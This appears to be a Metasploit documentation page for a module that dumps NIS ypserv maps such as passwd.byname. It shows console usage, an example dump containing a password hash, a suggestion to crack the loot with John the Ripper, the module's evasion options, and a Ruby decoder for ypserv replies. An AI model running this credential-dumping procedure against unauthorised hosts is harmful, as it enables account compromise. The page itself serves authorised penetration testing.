NIS ypserv Map Dumper - Metasploit


This page contains detailed information about how to use the auxiliary/gather/nis_ypserv_map Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: NIS ypserv Map Dumper
Module: auxiliary/gather/nis_ypserv_map
Source code: modules/auxiliary/gather/nis_ypserv_map.rb
Disclosure date: -
Last modification time: 2020-01-16 14:21:09 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 111
List of CVEs: -

This module dumps the specified map from NIS ypserv. The following nickname examples are from ypcat -x:

  • Use "ethers" for map "ethers.byname"

  • Use "aliases" for map "mail.aliases"

  • Use "services" for map "services.byname"

  • Use "protocols" for map "protocols.bynumber"

  • Use "hosts" for map "hosts.byname"

  • Use "networks" for map "networks.byaddr"

  • Use "group" for map "group.byname"

  • Use "passwd" for map "passwd.byname"

You may specify a map by one of the nicknames above.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/gather/nis_ypserv_map
msf auxiliary(nis_ypserv_map) > show targets
    ... a list of targets ...
msf auxiliary(nis_ypserv_map) > set TARGET target-id
msf auxiliary(nis_ypserv_map) > show options
    ... show and set options ...
msf auxiliary(nis_ypserv_map) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • DOMAIN: NIS domain

Knowledge Base


Introduction


If you've worked with old Unix systems before, you've probably encountered NIS (Network Information Service). The most familiar way of describing it is a sort of hybrid between DNS and LDAP.

Oracle says the following about it:

NIS is a distributed naming service. It is a mechanism for identifying and locating network objects and resources. It provides a uniform storage and retrieval method for network-wide information in a transport-protocol and media-independent fashion.

And on its use:

By running NIS, the system administrator can distribute administrative databases, called maps, among a variety of servers (master and slaves). The administrator can update those databases from a centralized location in an automatic and reliable fashion to ensure that all clients share the same naming service information in a consistent manner throughout the network.

The module documented here lets a tester dump any map from an NIS server running ypserv. Maps such as passwd.byname usually contain password hashes and user information, which can go a long way during a pentest.

Setup


Set up NIS as per https://help.ubuntu.com/community/SettingUpNISHowTo. If the link is down, you can find it via the Wayback Machine.

Options


PROTOCOL

Set this to either TCP or UDP. TCP is the default because the TCP service is the easier of the two to discover.

DOMAIN

Set this to your NIS domain.

MAP

Set this to the NIS map you want to dump. The default is passwd. You can use the nicknames described in the module info instead of the full map names.

XDRTimeout

Set this to the timeout in seconds for XDR decoding of the response.

Usage


msf > use auxiliary/gather/nis_ypserv_map
msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.0.2
rhost => 192.168.0.2
msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft
domain => gesellschaft
msf auxiliary(gather/nis_ypserv_map) > run

[+] 192.168.0.2:111 - Dumping map passwd.byname on domain gesellschaft:
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
games:*:5:60:games:/usr/games:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
uuidd:*:108:112::/run/uuidd:/bin/false
dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
root:*:0:0:root:/root:/bin/bash
sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
messagebus:*:107:111::/var/run/dbus:/bin/false
_apt:*:105:65534::/nonexistent:/bin/false
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
syslog:*:104:108::/home/syslog:/bin/false
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
pollinate:*:111:1::/var/cache/pollinate:/bin/false
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
lxd:*:106:65534::/var/lib/lxd/:/bin/false

[*] Auxiliary module execution completed
msf auxiliary(gather/nis_ypserv_map) >

After dumping a map, you can find it stored in loot later. You should be able to run something like John the Ripper directly on the passwd.byname map.

msf auxiliary(gather/nis_ypserv_map) > loot

Loot
====

host         service  type           name  content     info  path
----         -------  ----           ----  -------     ----  ----
192.168.0.2           passwd.byname        text/plain        /home/wvu/.msf4/loot/20180108143013_default_192.168.0.2_passwd.byname_509006.txt

msf auxiliary(gather/nis_ypserv_map) >


Msfconsole Usage


Here is how the gather/nis_ypserv_map auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/nis_ypserv_map

msf6 auxiliary(gather/nis_ypserv_map) > show info

       Name: NIS ypserv Map Dumper
     Module: auxiliary/gather/nis_ypserv_map
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  wvu <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  DOMAIN                     yes       NIS domain
  MAP       passwd           yes       NIS map to dump
  PROTOCOL  tcp              yes       Protocol to use (Accepted: tcp, udp)
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     111              yes       The target port (TCP)

Description:
  This module dumps the specified map from NIS ypserv. The following 
  examples are from ypcat -x: Use "ethers" for map "ethers.byname" Use 
  "aliases" for map "mail.aliases" Use "services" for map 
  "services.byname" Use "protocols" for map "protocols.bynumber" Use 
  "hosts" for map "hosts.byname" Use "networks" for map 
  "networks.byaddr" Use "group" for map "group.byname" Use "passwd" 
  for map "passwd.byname" You may specify a map by one of the 
  nicknames above.

References:
  https://tools.ietf.org/html/rfc1831
  https://tools.ietf.org/html/rfc4506

Module Options


This is a complete list of options available in the gather/nis_ypserv_map auxiliary module:

msf6 auxiliary(gather/nis_ypserv_map) > show options

Module options (auxiliary/gather/nis_ypserv_map):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   DOMAIN                     yes       NIS domain
   MAP       passwd           yes       NIS map to dump
   PROTOCOL  tcp              yes       Protocol to use (Accepted: tcp, udp)
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     111              yes       The target port (TCP)

Advanced Options


Here is a complete list of advanced options supported by the gather/nis_ypserv_map auxiliary module:

msf6 auxiliary(gather/nis_ypserv_map) > show advanced

Module advanced options (auxiliary/gather/nis_ypserv_map):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   TIMEOUT         10               yes       Number of seconds to wait for responses to RPC calls
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module
   XDRTimeout      10.0             yes       XDR decoding timeout

Auxiliary Actions


This is a list of all auxiliary actions that the gather/nis_ypserv_map module can do:

msf6 auxiliary(gather/nis_ypserv_map) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the gather/nis_ypserv_map auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/nis_ypserv_map) > show evasion

Module evasion options:

   Name                               Current Setting  Required  Description
   ----                               ---------------  --------  -----------
   ONCRPC::tcp_request_fragmentation  false            no        Enable fragmentation of TCP ONC/RPC requests
   TCP::max_send_size                 0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                    0                no        Delays inserted before every send.  (0 = disable)


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Could not connect to portmapper


Here is a relevant code snippet related to the "Could not connect to portmapper" error message:

        proto,  # Protocol: TCP (6)
        100004, # Program: YPSERV (100004)
        2       # Program Version: 2
      )
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Could not connect to portmapper')
    rescue Rex::Proto::SunRPC::RPCError
      fail_with(Failure::Unreachable, 'Could not connect to ypserv')
    end

    # Flavor: AUTH_NULL (0)

Could not connect to ypserv


Here is a relevant code snippet related to the "Could not connect to ypserv" error message:

        2       # Program Version: 2
      )
    rescue Rex::ConnectionError
      fail_with(Failure::Unreachable, 'Could not connect to portmapper')
    rescue Rex::Proto::SunRPC::RPCError
      fail_with(Failure::Unreachable, 'Could not connect to ypserv')
    end

    # Flavor: AUTH_NULL (0)
    sunrpc_authnull


Could not call ypserv procedure


Here is a relevant code snippet related to the "Could not call ypserv procedure" error message:

      res = sunrpc_call(
        8,              # Procedure: ALL (8)
        ypserv_all_call # Yellow Pages Service ALL call
      )
    rescue Rex::Proto::SunRPC::RPCError
      fail_with(Failure::NotFound, 'Could not call ypserv procedure')
    ensure
      # Shut it down! Shut it down forever!
      sunrpc_destroy
    end


Invalid response from server


Here is a relevant code snippet related to the "Invalid response from server" error message:

      # Shut it down! Shut it down forever!
      sunrpc_destroy
    end

    unless res && res.length > 8
      fail_with(Failure::UnexpectedReply, 'Invalid response from server')
      return
    end

    # XXX: Rex::Encoder::XDR doesn't do signed ints
    case res[4, 4].unpack('l>').first

Invalid map <MAP_NAME> specified


Here is a relevant code snippet related to the "Invalid map <MAP_NAME> specified" error message:


    # XXX: Rex::Encoder::XDR doesn't do signed ints
    case res[4, 4].unpack('l>').first
    # Status: YP_NOMAP (-1)
    when -1
      fail_with(Failure::BadConfig, "Invalid map #{map_name} specified")
    # Status: YP_NODOM (-2)
    when -2
      fail_with(Failure::BadConfig, "Invalid domain #{domain} specified")
    end


Invalid domain <DOMAIN> specified


Here is a relevant code snippet related to the "Invalid domain <DOMAIN> specified" error message:

    # Status: YP_NOMAP (-1)
    when -1
      fail_with(Failure::BadConfig, "Invalid map #{map_name} specified")
    # Status: YP_NODOM (-2)
    when -2
      fail_with(Failure::BadConfig, "Invalid domain #{domain} specified")
    end

    map = begin
      Timeout.timeout(datastore['XDRTimeout']) do
        parse_map(res)

Could not parse map <MAP_NAME>


Here is a relevant code snippet related to the "Could not parse map <MAP_NAME>" error message:

                'XDR decoding timed out (try increasing XDRTimeout?)')
      return
    end

    if map.blank?
      fail_with(Failure::Unknown, "Could not parse map #{map_name}")
      return
    end

    map_file = map.values.join("\n") + "\n"

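The "Invalid response from server", "Invalid map", "Invalid domain" and "Could not parse map" checks above all hinge on how the ypserv ALL reply is laid out on the wire. The following decoder is an added example, not the module's own parse_map, and it assumes the ypresp_all / ypresp_key_val layout from yp.x (records of bool more, signed stat, opaque val, opaque key, terminated by more == FALSE), which this page does not reproduce; the sample replies are constructed, not captured traffic.

```ruby
# Added example, not the module's own code: decode a ypserv v2 ALL (proc 8) reply
# into a map, mirroring the module's res.length > 8 check, its signed unpack('l>')
# status read and its YP_NOMAP (-1) / YP_NODOM (-2) handling. Assumed wire layout
# (ypresp_all/ypresp_key_val from yp.x, not on this page): records of
# { bool more; int stat; opaque val<>; opaque key<> } ended by more == FALSE;
# opaques are length-prefixed and padded to 4 bytes (RFC 4506).

# Read one 4-byte XDR word with the given unpack format; returns [value, next_off].
def xdr_word(buf, off, fmt)
  raise ArgumentError, 'truncated word' if buf.bytesize < off + 4
  [buf.byteslice(off, 4).unpack1(fmt), off + 4]
end
# Read one XDR variable-length opaque; returns [bytes, next_off].
def xdr_opaque(buf, off)
  len, off = xdr_word(buf, off, 'N')
  raise ArgumentError, 'truncated opaque' if buf.bytesize < off + len
  [buf.byteslice(off, len), off + len + ((4 - len % 4) % 4)]
end

# Decode a reply into { key => value }; raises on the two YP error statuses.
def parse_ypall(res)
  raise ArgumentError, 'Invalid response from server' unless res && res.bytesize > 8
  map = {}
  off = 0
  loop do
    more, off = xdr_word(res, off, 'N')    # XDR bool
    break if more.zero?                    # more == FALSE ends the stream
    stat, off = xdr_word(res, off, 'l>')   # signed ypstat, as in the module
    case stat
    when -1 then raise ArgumentError, 'YP_NOMAP: invalid map specified'
    when -2 then raise ArgumentError, 'YP_NODOM: invalid domain specified'
    end
    val, off = xdr_opaque(res, off)
    key, off = xdr_opaque(res, off)
    map[key] = val if stat == 1            # YP_TRUE; YP_NOMORE (2) adds no entry
  end
  map
end

# Constructed sample replies (not captured traffic), encoded the same way.
def pack_opaque(s)
  s = s.b
  [s.bytesize].pack('N') + s + ("\0" * ((4 - s.bytesize % 4) % 4))
end
def ypall_record(key, val, stat = 1)
  [1, stat].pack('Nl>') + pack_opaque(val) + pack_opaque(key)
end
SAMPLE_REPLY = ypall_record('root', 'root:*:0:0:root:/root:/bin/bash') +
               ypall_record('games', 'games:*:5:60:games:/usr/games:/usr/sbin/nologin') +
               ypall_record('', '', 2) + [0].pack('N')   # YP_NOMORE, then more = FALSE
NOMAP_REPLY = ypall_record('', '', -1) + [0].pack('N')
```

Feeding SAMPLE_REPLY to parse_ypall yields the two passwd entries keyed by user name, while NOMAP_REPLY raises the same condition the module reports as "Invalid map".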

Authors


wvu

Version


This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.
